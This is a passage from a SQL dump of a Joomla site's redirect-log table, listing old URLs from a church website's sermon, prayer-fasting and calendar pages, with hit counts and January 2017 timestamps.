(1069, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/54938', NULL, '', '', 1, 0, '2017-01-08 17:02:12', '0000-00-00 00:00:00', 301),
(1070, 'http://www.lifeoasisinternationalchurch.org/index.php/81-prayer-focus-for-day-2', NULL, '', '', 9, 0, '2017-01-08 17:11:48', '0000-00-00 00:00:00', 301),
(1071, 'http://www.lifeoasisinternationalchurch.org/index.php/213-2015-day-39', NULL, '', '', 7, 0, '2017-01-08 18:25:08', '0000-00-00 00:00:00', 301),
(1072, 'http://lifeoasisinternationalchurch.org/gobc2016', NULL, '', '', 110, 0, '2017-01-08 18:46:13', '0000-00-00 00:00:00', 301),
(1073, 'http://www.lifeoasisinternationalchurch.org/media/com_sermonspeaker/css/css-4d49fbf156a573f3f03da4ac5e633a18.php', NULL, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/26-understanding-the-force-of-faith-2', '', 33, 0, '2017-01-08 20:01:25', '0000-00-00 00:00:00', 301),
(1074, 'http://ljmti.lifeoasisinternationalchurch.org/digital/weekly-podcast', NULL, '', '', 1, 0, '2017-01-08 20:30:27', '0000-00-00 00:00:00', 301),
(1075, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-users', NULL, '', '', 1, 0, '2017-01-08 21:37:29', '0000-00-00 00:00:00', 301),
(1076, 'http://www.lifeoasisinternationalchurch.org/index.php/126-2014-5', NULL, '', '', 2, 0, '2017-01-08 21:38:05', '0000-00-00 00:00:00', 301),
(1077, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1927/4/-', NULL, '', '', 1, 0, '2017-01-08 21:58:05', '0000-00-00 00:00:00', 301),
(1078, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1923/9/-', NULL, '', '', 1, 0, '2017-01-08 21:58:16', '0000-00-00 00:00:00', 301),
(1079, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1924/12/-', NULL, '', '', 1, 0, '2017-01-08 21:58:27', '0000-00-00 00:00:00', 301),
(1080, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/12/-', NULL, '', '', 1, 0, '2017-01-08 21:58:38', '0000-00-00 00:00:00', 301),
(1081, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/12/-', NULL, '', '', 1, 0, '2017-01-08 21:58:49', '0000-00-00 00:00:00', 301),
(1082, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1922/10/-', NULL, '', '', 1, 0, '2017-01-08 21:59:09', '0000-00-00 00:00:00', 301),
(1083, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1923/11/-', NULL, '', '', 1, 0, '2017-01-08 21:59:19', '0000-00-00 00:00:00', 301),
(1084, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1925/3/-', NULL, '', '', 1, 0, '2017-01-08 21:59:30', '0000-00-00 00:00:00', 301),
(1085, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/8/-', NULL, '', '', 1, 0, '2017-01-08 21:59:40', '0000-00-00 00:00:00', 301),
(1086, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1928/6/-', NULL, '', '', 1, 0, '2017-01-08 22:00:32', '0000-00-00 00:00:00', 301),
(1087, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1922/9/-', NULL, '', '', 1, 0, '2017-01-08 22:00:42', '0000-00-00 00:00:00', 301),
(1088, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1927/5/-', NULL, '', '', 1, 0, '2017-01-08 22:00:52', '0000-00-00 00:00:00', 301),
(1089, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/1/-', NULL, '', '', 1, 0, '2017-01-08 22:01:13', '0000-00-00 00:00:00', 301),
(1090, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/3/-', NULL, '', '', 1, 0, '2017-01-08 22:01:44', '0000-00-00 00:00:00', 301),
(1091, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/9/-', NULL, '', '', 1, 0, '2017-01-08 22:02:16', '0000-00-00 00:00:00', 301),
(1092, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/30/-', NULL, '', '', 1, 0, '2017-01-08 22:02:26', '0000-00-00 00:00:00', 301),
(1093, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/13/-', NULL, '', '', 1, 0, '2017-01-08 22:02:38', '0000-00-00 00:00:00', 301),
(1094, 'http://www.lifeoasisinternationalchurch.org/index.php/210-2015-day-36', NULL, '', '', 9, 0, '2017-01-08 22:22:26', '0000-00-00 00:00:00', 301),
(1095, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1926/4/-', NULL, '', '', 1, 0, '2017-01-08 23:07:58', '0000-00-00 00:00:00', 301),
(1096, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1921/10/-', NULL, '', '', 1, 0, '2017-01-08 23:38:13', '0000-00-00 00:00:00', 301),
(1097, 'http://lifeoasisinternationalchurch.org/index.php/videos', NULL, '', '', 12, 0, '2017-01-08 23:46:31', '0000-00-00 00:00:00', 301),
(1098, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/18-army-of-the-lord-1', NULL, '', '', 7, 0, '2017-01-08 23:47:25', '0000-00-00 00:00:00', 301),
(1099, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/13/-', NULL, '', '', 1, 0, '2017-01-08 23:53:20', '0000-00-00 00:00:00', 301),
(1100, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/28/-', NULL, '', '', 1, 0, '2017-01-09 00:38:45', '0000-00-00 00:00:00', 301),
(1101, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1922/11/-', NULL, '', '', 1, 0, '2017-01-09 00:57:40', '0000-00-00 00:00:00', 301),
(1102, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/19/-', NULL, '', '', 1, 0, '2017-01-09 01:05:15', '0000-00-00 00:00:00', 301),
(1103, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/8/-', NULL, '', '', 1, 0, '2017-01-09 01:12:50', '0000-00-00 00:00:00', 301),
(1104, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/59431', NULL, '', '', 1, 0, '2017-01-09 01:13:05', '0000-00-00 00:00:00', 301),
(1105, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/27/-', NULL, '', '', 1, 0, '2017-01-09 01:20:24', '0000-00-00 00:00:00', 301),
(1106, 'http://www.lifeoasisinternationalchurch.org/index.php/component/content/article/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-09 01:23:03', '0000-00-00 00:00:00', 301),
(1107, 'http://lifeoasisinternationalchurch.org/component/content/article/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-09 01:23:52', '0000-00-00 00:00:00', 301),
(1108, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=47&Itemid=189', NULL, '', '', 1, 0, '2017-01-09 01:25:12', '0000-00-00 00:00:00', 301),
(1109, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/50-prayer-a-fasting-day-40', NULL, '', '', 3, 0, '2017-01-09 01:29:06', '0000-00-00 00:00:00', 301),
(1110, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1922/8/-', NULL, '', '', 1, 0, '2017-01-09 01:31:46', '0000-00-00 00:00:00', 301),
(1111, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&Itemid=189', NULL, '', '', 2, 0, '2017-01-09 01:41:49', '0000-00-00 00:00:00', 301),
(1112, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/8/-', NULL, '', '', 1, 0, '2017-01-09 01:47:09', '0000-00-00 00:00:00', 301),
(1113, 'http://lifeoasisinternationalchurch.org/index.php/component/content/article/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-01-09 01:47:52', '0000-00-00 00:00:00', 301),
(1114, 'http://www.lifeoasisinternationalchurch.org/index.php/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&Itemid=189', NULL, '', '', 3, 0, '2017-01-09 01:50:40', '0000-00-00 00:00:00', 301),
(1115, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1921/9/-', NULL, '', '', 1, 0, '2017-01-09 01:50:41', '0000-00-00 00:00:00', 301),
(1116, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/30/-', NULL, '', '', 1, 0, '2017-01-09 01:54:39', '0000-00-00 00:00:00', 301),
(1117, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/5/-', NULL, '', '', 1, 0, '2017-01-09 01:58:40', '0000-00-00 00:00:00', 301),
(1118, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&Itemid=189', NULL, '', '', 2, 0, '2017-01-09 02:01:36', '0000-00-00 00:00:00', 301),
(1119, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1926/5/-', NULL, '', '', 1, 0, '2017-01-09 02:02:15', '0000-00-00 00:00:00', 301),
(1120, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&Itemid=189', NULL, '', '', 2, 0, '2017-01-09 02:04:28', '0000-00-00 00:00:00', 301),
(1121, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/11/-', NULL, '', '', 1, 0, '2017-01-09 02:05:47', '0000-00-00 00:00:00', 301),
(1122, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/3/-', NULL, '', '', 1, 0, '2017-01-09 02:09:36', '0000-00-00 00:00:00', 301),
(1123, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/29/-', NULL, '', '', 1, 0, '2017-01-09 02:13:23', '0000-00-00 00:00:00', 301),
(1124, 'http://www.lifeoasisinternationalchurch.org/index.php/index.php?option=com_content&view=article&id=50:young-achievers&catid=18:loic', NULL, '', '', 1, 0, '2017-01-09 02:15:19', '0000-00-00 00:00:00', 301),
(1125, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1925/4/-', NULL, '', '', 1, 0, '2017-01-09 02:17:12', '0000-00-00 00:00:00', 301),
(1126, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/18/-', NULL, '', '', 1, 0, '2017-01-09 02:20:54', '0000-00-00 00:00:00', 301),
(1127, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/1/-', NULL, '', '', 1, 0, '2017-01-09 02:24:41', '0000-00-00 00:00:00', 301),
(1128, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1921/11/-', NULL, '', '', 1, 0, '2017-01-09 02:28:27', '0000-00-00 00:00:00', 301),
(1129, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/19/-', NULL, '', '', 1, 0, '2017-01-09 02:32:15', '0000-00-00 00:00:00', 301),
(1130, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1925/5/-', NULL, '', '', 1, 0, '2017-01-09 02:36:02', '0000-00-00 00:00:00', 301),
(1131, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1922/7/-', NULL, '', '', 1, 0, '2017-01-09 02:39:51', '0000-00-00 00:00:00', 301),
(1132, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/71567', NULL, '', '', 1, 0, '2017-01-09 02:41:04', '0000-00-00 00:00:00', 301),
(1133, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1920/9/-', NULL, '', '', 1, 0, '2017-01-09 02:43:36', '0000-00-00 00:00:00', 301),
(1134, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1921/8/-', NULL, '', '', 1, 0, '2017-01-09 02:47:24', '0000-00-00 00:00:00', 301),
(1135, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1923/8/-', NULL, '', '', 1, 0, '2017-01-09 02:51:11', '0000-00-00 00:00:00', 301),
(1136, 'http://lifeoasisinternationalchurch.org/index.php/161-day-33', NULL, '', '', 1, 0, '2017-01-09 02:54:34', '0000-00-00 00:00:00', 301),
(1137, 'http://lifeoasisinternationalchurch.org/index.php/component/content/article/18-wifi-zion/41-branches', NULL, '', '', 3, 0, '2017-01-09 03:19:32', '0000-00-00 00:00:00', 301),
(1138, 'http://lifeoasisinternationalchurch.org/index.php/component/content/article/18-wifi-zion/36-wife-of-vip-s-outlines', NULL, '', '', 1, 0, '2017-01-09 03:32:42', '0000-00-00 00:00:00', 301),
(1139, 'http://lifeoasisinternationalchurch.org/msd/sql.php', NULL, '', '', 4, 0, '2017-01-09 03:47:18', '0000-00-00 00:00:00', 301),
(1140, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 4, 0, '2017-01-09 04:49:03', '0000-00-00 00:00:00', 301),
(1141, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/41-prayer-a-fasting-day-32', NULL, 'https://www.google.com.ng/', '', 9, 0, '2017-01-09 05:29:16', '0000-00-00 00:00:00', 301),
(1142, 'https://www.spiritmeat.net/component/content/article/12-sample-content/14-sample-content-3', NULL, '', '', 2, 0, '2017-01-09 05:53:02', '0000-00-00 00:00:00', 301),
(1143, 'https://www.spiritmeat.net/resources/hd/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-01-09 05:56:27', '0000-00-00 00:00:00', 301),
(1144, 'http://www.lifeoasisinternationalchurch.org/index.php/191-2015-day-15', NULL, '', '', 8, 0, '2017-01-09 07:27:08', '0000-00-00 00:00:00', 301),
(1145, 'http://www.lifeoasisinternationalchurch.org/index.php/64-prayer-focus-for-day-11', NULL, '', '', 5, 0, '2017-01-09 07:50:44', '0000-00-00 00:00:00', 301),
(1146, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/9/-', NULL, '', '', 1, 0, '2017-01-09 08:48:17', '0000-00-00 00:00:00', 301),
(1147, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1919/9/-', NULL, '', '', 1, 0, '2017-01-09 08:48:17', '0000-00-00 00:00:00', 301),
(1148, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1920/8/-', NULL, '', '', 1, 0, '2017-01-09 08:48:23', '0000-00-00 00:00:00', 301),
(1149, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/24/-', NULL, '', '', 1, 0, '2017-01-09 08:48:41', '0000-00-00 00:00:00', 301),
(1150, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/12/-', NULL, '', '', 1, 0, '2017-01-09 08:48:45', '0000-00-00 00:00:00', 301),
(1151, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1923/7/-', NULL, '', '', 1, 0, '2017-01-09 08:49:01', '0000-00-00 00:00:00', 301),
(1152, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/18/-', NULL, '', '', 1, 0, '2017-01-09 08:49:07', '0000-00-00 00:00:00', 301),
(1153, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1922/6/-', NULL, '', '', 1, 0, '2017-01-09 08:49:13', '0000-00-00 00:00:00', 301),
(1154, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1921/7/-', NULL, '', '', 1, 0, '2017-01-09 08:49:19', '0000-00-00 00:00:00', 301),
(1155, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/7/-', NULL, '', '', 1, 0, '2017-01-09 08:49:32', '0000-00-00 00:00:00', 301),
(1156, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/24/-', NULL, '', '', 1, 0, '2017-01-09 08:49:35', '0000-00-00 00:00:00', 301),
(1157, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/9/-', NULL, '', '', 1, 0, '2017-01-09 08:49:44', '0000-00-00 00:00:00', 301),
(1158, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/27/-', NULL, '', '', 1, 0, '2017-01-09 08:50:09', '0000-00-00 00:00:00', 301),
(1159, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/29/-', NULL, '', '', 1, 0, '2017-01-09 08:50:27', '0000-00-00 00:00:00', 301),
(1160, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1924/5/-', NULL, '', '', 1, 0, '2017-01-09 08:50:33', '0000-00-00 00:00:00', 301),
(1161, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/16/-', NULL, '', '', 1, 0, '2017-01-09 08:50:39', '0000-00-00 00:00:00', 301),
(1162, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/3/-', NULL, '', '', 1, 0, '2017-01-09 08:50:52', '0000-00-00 00:00:00', 301),
(1163, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/2/-', NULL, '', '', 1, 0, '2017-01-09 08:50:58', '0000-00-00 00:00:00', 301),
(1164, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/21/-', NULL, '', '', 1, 0, '2017-01-09 08:51:11', '0000-00-00 00:00:00', 301),
(1165, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1920/10/-', NULL, '', '', 1, 0, '2017-01-09 08:51:12', '0000-00-00 00:00:00', 301),
(1166, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1918/9/-', NULL, '', '', 1, 0, '2017-01-09 08:51:16', '0000-00-00 00:00:00', 301),
(1167, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1919/8/-', NULL, '', '', 1, 0, '2017-01-09 08:51:29', '0000-00-00 00:00:00', 301),
(1168, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/1/-', NULL, '', '', 1, 0, '2017-01-09 08:51:35', '0000-00-00 00:00:00', 301),
(1169, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/6/-', NULL, '', '', 1, 0, '2017-01-09 08:51:41', '0000-00-00 00:00:00', 301),
(1170, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1920/7/-', NULL, '', '', 1, 0, '2017-01-09 08:52:00', '0000-00-00 00:00:00', 301),
(1171, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/18/-', NULL, '', '', 1, 0, '2017-01-09 08:52:06', '0000-00-00 00:00:00', 301),
(1172, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1921/6/-', NULL, '', '', 1, 0, '2017-01-09 08:52:12', '0000-00-00 00:00:00', 301),
(1173, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1919/10/-', NULL, '', '', 1, 0, '2017-01-09 08:52:25', '0000-00-00 00:00:00', 301),
(1174, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1920/6/-', NULL, '', '', 1, 0, '2017-01-09 08:52:31', '0000-00-00 00:00:00', 301),
(1175, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1917/9/-', NULL, '', '', 1, 0, '2017-01-09 08:52:38', '0000-00-00 00:00:00', 301),
(1176, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1919/7/-', NULL, '', '', 1, 0, '2017-01-09 08:52:44', '0000-00-00 00:00:00', 301),
(1177, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1918/8/-', NULL, '', '', 1, 0, '2017-01-09 08:52:52', '0000-00-00 00:00:00', 301),
(1178, 'http://www.lifeoasisinternationalchurch.org/index.php/204-2015-day-30', NULL, '', '', 8, 0, '2017-01-09 09:07:03', '0000-00-00 00:00:00', 301),
(1179, 'http://www.lifeoasisinternationalchurch.org/index.php/214-2015-day-21', NULL, '', '', 7, 0, '2017-01-09 09:12:54', '0000-00-00 00:00:00', 301),
(1180, 'http://www.lifeoasisinternationalchurch.org/index.php/206-2015-day-32', NULL, '', '', 7, 0, '2017-01-09 09:14:13', '0000-00-00 00:00:00', 301),
(1181, 'http://www.lifeoasisinternationalchurch.org/index.php/208-2015-day-34', NULL, '', '', 8, 0, '2017-01-09 09:24:27', '0000-00-00 00:00:00', 301),
(1182, 'http://www.lifeoasisinternationalchurch.org/index.php/211-2015-day-37', NULL, '', '', 10, 0, '2017-01-09 09:27:51', '0000-00-00 00:00:00', 301),
(1183, 'http://www.lifeoasisinternationalchurch.org/index.php/203-2015-day-29', NULL, '', '', 6, 0, '2017-01-09 09:39:06', '0000-00-00 00:00:00', 301),
(1184, 'http://www.lifeoasisinternationalchurch.org/index.php/190-2015-day-14', NULL, '', '', 8, 0, '2017-01-09 09:39:16', '0000-00-00 00:00:00', 301),
(1185, 'http://www.lifeoasisinternationalchurch.org/index.php/209-2015-day-35', NULL, '', '', 5, 0, '2017-01-09 09:44:52', '0000-00-00 00:00:00', 301),
(1186, 'http://www.lifeoasisinternationalchurch.org/index.php/216-2015-day-28', NULL, '', '', 7, 0, '2017-01-09 09:46:23', '0000-00-00 00:00:00', 301),
(1187, 'http://www.lifeoasisinternationalchurch.org/index.php/215-2015-day-13-1', NULL, '', '', 6, 0, '2017-01-09 09:55:52', '0000-00-00 00:00:00', 301),
(1188, 'http://www.lifeoasisinternationalchurch.org/index.php/134-prayer-focus-for-day-9', NULL, '', '', 7, 0, '2017-01-09 09:57:07', '0000-00-00 00:00:00', 301),
(1189, 'http://www.lifeoasisinternationalchurch.org/index.php/257-day-8-of-21-days-fasting-and-prayer-october', NULL, '', '', 8, 0, '2017-01-09 10:02:37', '0000-00-00 00:00:00', 301),
(1190, 'http://www.lifeoasisinternationalchurch.org/index.php/258-day-9-of-21-days-fasting-and-prayer-october', NULL, '', '', 11, 0, '2017-01-09 10:11:28', '0000-00-00 00:00:00', 301),
(1191, 'http://www.lifeoasisinternationalchurch.org/index.php/254-day-19-of-22-days-fasting-and-prayer-october', NULL, '', '', 6, 0, '2017-01-09 10:12:16', '0000-00-00 00:00:00', 301),
(1192, 'http://www.lifeoasisinternationalchurch.org/index.php/250-day-15-of-21-days-fasting-and-prayer-october', NULL, '', '', 5, 0, '2017-01-09 10:17:33', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(1193, 'http://www.lifeoasisinternationalchurch.org/index.php/246-day-10-of-21-days-fasting-and-prayer-october', NULL, '', '', 7, 0, '2017-01-09 10:20:08', '0000-00-00 00:00:00', 301),
(1194, 'http://www.lifeoasisinternationalchurch.org/index.php/256-day-21-of-21-days-fasting-and-prayer-october', NULL, '', '', 11, 0, '2017-01-09 10:23:06', '0000-00-00 00:00:00', 301),
(1195, 'http://www.lifeoasisinternationalchurch.org/index.php/247-day-11-of-21-days-fasting-and-prayer-october', NULL, '', '', 5, 0, '2017-01-09 10:24:03', '0000-00-00 00:00:00', 301),
(1196, 'http://www.lifeoasisinternationalchurch.org/index.php/251-day-16-of-21-days-fasting-and-prayer-october', NULL, '', '', 7, 0, '2017-01-09 10:28:46', '0000-00-00 00:00:00', 301),
(1197, 'http://www.lifeoasisinternationalchurch.org/index.php/249-day-14-of-21-days-fasting-and-prayer-october', NULL, '', '', 9, 0, '2017-01-09 10:32:23', '0000-00-00 00:00:00', 301),
(1198, 'http://www.lifeoasisinternationalchurch.org/youtube', NULL, '', '', 2, 0, '2017-01-09 10:32:52', '0000-00-00 00:00:00', 301),
(1199, 'http://www.lifeoasisinternationalchurch.org/index.php/255-day-20-of-21-days-fasting-and-prayer-october', NULL, '', '', 8, 0, '2017-01-09 10:37:14', '0000-00-00 00:00:00', 301),
(1200, 'http://www.lifeoasisinternationalchurch.org/index.php/245-day-6-of-21-days-fasting-and-prayer-october-2', NULL, '', '', 7, 0, '2017-01-09 10:37:33', '0000-00-00 00:00:00', 301),
(1201, 'http://www.lifeoasisinternationalchurch.org/index.php/252-day-16-of-21-days-fasting-and-prayer-october-2', NULL, '', '', 9, 0, '2017-01-09 10:40:41', '0000-00-00 00:00:00', 301),
(1202, 'http://www.lifeoasisinternationalchurch.org/index.php/253-day-16-of-21-days-fasting-and-prayer-october-3', NULL, '', '', 10, 0, '2017-01-09 10:41:36', '0000-00-00 00:00:00', 301),
(1203, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/12', NULL, '', '', 27, 0, '2017-01-09 10:46:56', '0000-00-00 00:00:00', 301),
(1204, 'http://lifeoasisinternationalchurch.org/2-uncategorised/47-videos', NULL, '', '', 2, 0, '2017-01-09 11:38:24', '0000-00-00 00:00:00', 301),
(1205, 'http://www.lifeoasisinternationalchurch.org/template-info-2/our-service-schedule/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-09 12:14:46', '0000-00-00 00:00:00', 301),
(1206, 'http://www.lifeoasisinternationalchurch.org/template-info/musci', NULL, '', '', 31, 0, '2017-01-09 14:28:08', '0000-00-00 00:00:00', 301),
(1207, 'http://www.lifeoasisinternationalchurch.org/media/mass.php', NULL, '', '', 5, 0, '2017-01-09 15:35:42', '0000-00-00 00:00:00', 301),
(1208, 'http://www.lifeoasisinternationalchurch.org/media/jmail.php', NULL, '', '', 2, 0, '2017-01-09 15:35:43', '0000-00-00 00:00:00', 301),
(1209, 'http://www.lifeoasisinternationalchurch.org/index.php/277-day-17-of-21-days-fasting-and-prayer-november', NULL, '', '', 12, 0, '2017-01-09 15:37:23', '0000-00-00 00:00:00', 301),
(1210, 'http://www.lifeoasisinternationalchurch.org/index.php/237-2016-day-20', NULL, '', '', 8, 0, '2017-01-09 15:37:38', '0000-00-00 00:00:00', 301),
(1211, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/21-prophetic-words-for-day-13', NULL, '', '', 8, 0, '2017-01-09 15:38:44', '0000-00-00 00:00:00', 301),
(1212, 'http://www.lifeoasisinternationalchurch.org/index.php/227-2016-day-10', NULL, '', '', 7, 0, '2017-01-09 15:38:52', '0000-00-00 00:00:00', 301),
(1213, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/52-prayer-a-fasting-day-4', NULL, '', '', 12, 0, '2017-01-09 15:39:48', '0000-00-00 00:00:00', 301),
(1214, 'http://www.lifeoasisinternationalchurch.org/index.php/13-2014fasting-prayer/174-prayer-focus-for-day-12', NULL, '', '', 11, 0, '2017-01-09 15:40:46', '0000-00-00 00:00:00', 301),
(1215, 'http://www.lifeoasisinternationalchurch.org/index.php/230-2016-day-13', NULL, '', '', 6, 0, '2017-01-09 15:43:49', '0000-00-00 00:00:00', 301),
(1216, 'http://www.lifeoasisinternationalchurch.org/index.php/236-2016-day-19', NULL, '', '', 7, 0, '2017-01-09 15:51:00', '0000-00-00 00:00:00', 301),
(1217, 'http://www.lifeoasisinternationalchurch.org/index.php/183-2015-day-7', NULL, '', '', 6, 0, '2017-01-09 16:06:12', '0000-00-00 00:00:00', 301),
(1218, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/26/-', NULL, '', '', 1, 0, '2017-01-09 16:23:04', '0000-00-00 00:00:00', 301),
(1219, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/23/-', NULL, '', '', 1, 0, '2017-01-09 16:23:12', '0000-00-00 00:00:00', 301),
(1220, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/13/-', NULL, '', '', 1, 0, '2017-01-09 16:23:20', '0000-00-00 00:00:00', 301),
(1221, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/5/-', NULL, '', '', 1, 0, '2017-01-09 16:23:28', '0000-00-00 00:00:00', 301),
(1222, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/20/-', NULL, '', '', 1, 0, '2017-01-09 16:23:36', '0000-00-00 00:00:00', 301),
(1223, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/21/-', NULL, '', '', 1, 0, '2017-01-09 16:23:52', '0000-00-00 00:00:00', 301),
(1224, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1918/10/-', NULL, '', '', 1, 0, '2017-01-09 16:24:00', '0000-00-00 00:00:00', 301),
(1225, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1919/11/-', NULL, '', '', 1, 0, '2017-01-09 16:24:16', '0000-00-00 00:00:00', 301),
(1226, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1920/11/-', NULL, '', '', 1, 0, '2017-01-09 16:24:24', '0000-00-00 00:00:00', 301),
(1227, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/10/-', NULL, '', '', 1, 0, '2017-01-09 16:24:32', '0000-00-00 00:00:00', 301),
